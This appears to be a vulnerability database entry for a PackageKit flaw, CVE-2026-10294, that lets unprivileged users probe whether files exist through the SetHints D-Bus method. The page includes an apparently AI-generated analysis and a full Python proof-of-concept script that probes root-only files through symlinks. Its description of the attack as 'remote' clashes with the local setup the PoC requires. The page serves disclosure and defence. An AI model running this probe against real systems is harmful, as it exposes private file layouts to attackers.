CVE-2026-10294
Description
PackageKit up to 1.3.5 allows unprivileged users to probe any file's existence remotely via the SetHints D-Bus method.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PackageKit up to 1.3.5 allows unprivileged users to probe any file's existence remotely via the SetHints D-Bus method.
Vulnerability
A vulnerability exists in PackageKit versions up to and including 1.3.5, specifically within the g_file_test function in src/pk-transaction.c. The SetHints D-Bus method accepts a frontend-socket parameter, which is expected to be a path to a Unix socket. However, the underlying g_file_test function follows symbolic links as root, allowing for improper authorization checks [1].
Exploitation
An unprivileged, remote attacker can exploit this vulnerability by sending a crafted SetHints D-Bus request. The attacker needs to provide a frontend-socket argument that is a symbolic link pointing to an arbitrary file or directory on the system. The g_file_test function, when called with this symlink, will resolve it as root, enabling the attacker to probe for the existence of any file, including those in root-privileged directories [1].
Impact
Successful exploitation allows an unprivileged attacker to determine the existence of any file on the system. This information disclosure can be used to map out sensitive file locations or identify system configurations, potentially aiding in further attacks. The vulnerability does not grant elevated privileges or direct control over the system, but it enables unauthorized file probing [1].
Mitigation
PackageKit versions up to 1.3.5 are affected. A fix for this vulnerability is available in newer versions of PackageKit. Users are advised to update to a patched version as soon as possible. No specific version number for the fix or release date was disclosed in the available references [2].
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=1.3.5
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The g_file_test() function follows symbolic links as root, allowing unauthorized file existence checks."
Attack vector
An unprivileged, remote attacker can call the SetHints D-Bus method on PackageKit. By providing a symbolic link path to the frontend-socket parameter, the attacker can leverage the g_file_test() function's behavior to probe for the existence of any file on the system, even those they should not have access to [ref_id=1]. This is possible because the SetHints method lacks a proper authorization check beyond verifying the sender matches the transaction creator [ref_id=1].
Affected code
The vulnerability resides in the `pk_transaction_set_hint` function within the file `src/pk-transaction.c`. Specifically, the `g_file_test(value, G_FILE_TEST_EXISTS)` call is at fault, as it follows symbolic links as root [ref_id=1]. The `SetHints` method, which calls this function, lacks sufficient authorization checks [ref_id=1].
What the fix does
The advisory does not provide a patch. Remediation guidance suggests that the vulnerability is addressed by ensuring that symbolic links are not followed when checking file existence for the frontend-socket parameter. This prevents unprivileged users from probing arbitrary files on the system.
Preconditions
- authThe attacker must be an unprivileged user.
- networkThe attacker can reach the PackageKit D-Bus interface remotely.
- inputThe attacker must be able to provide a symbolic link path to the frontend-socket parameter.
Reproduction
First, set up a root privileged directory /tmp/root_only_dir and put a txt file in it named exist.txt. Then create symlinks /var/tmp/pk-test/exist.txt ->/tmp/root_only_dir/exist.txt, and /var/tmp/pk-test/non_exist.txt -> /tmp/root_only_dir/non_exist.rpm.
Then run this PoC: ```python import dbus import sys import os import time
def probe_file(bus, symlink_path): pk = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit') tid = dbus.Interface(pk, 'org.freedesktop.PackageKit').CreateTransaction() trans = bus.get_object('org.freedesktop.PackageKit', tid) trans_iface = dbus.Interface(trans, 'org.freedesktop.PackageKit.Transaction')
try: trans_iface.SetHints([f"frontend-socket={symlink_path}"]) return 'EXISTS' except dbus.exceptions.DBusException as e: if 'does not exist' in str(e).lower(): return 'NOT_FOUND' return 'EXISTS'
def main(): if os.geteuid() == 0: print("[!] Run as normal user, not root!") sys.exit(1)
bus = dbus.SystemBus()
print("SetHints frontend-socket Symlink Oracle PoC") print(f"Running as: {os.getenv('USER')} (UID {os.getuid()})") print()
test_files = [ ("Text file", "/tmp/root_only_dir/exist.txt", "/var/tmp/pk-test/exist.txt"), ("Non-existent", "/tmp/root_only_dir/non_exist.rpm", "/var/tmp/pk-test/non_exist.txt"), ]
for name, target, symlink in test_files: if not os.path.islink(symlink): print(f"{name}: symlink not found ({symlink}), create symlinks first") continue try: status = probe_file(bus, symlink) print(f"{name}: {status} (target: {target})") time.sleep(0.5) except Exception as e: print(f"{name}: Error probing {symlink} - {e}")
if __name__ == "__main__": main() ``` The expected output should be something like this: ``` Text file: EXISTS (target: /tmp/root_only_dir/exist.txt) Non-existent: NOT_FOUND (target: /tmp/root_only_dir/non_exist.rpm) ``` This demonstrates this arbitrary file probing vulnerability. [ref_id=1]
Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.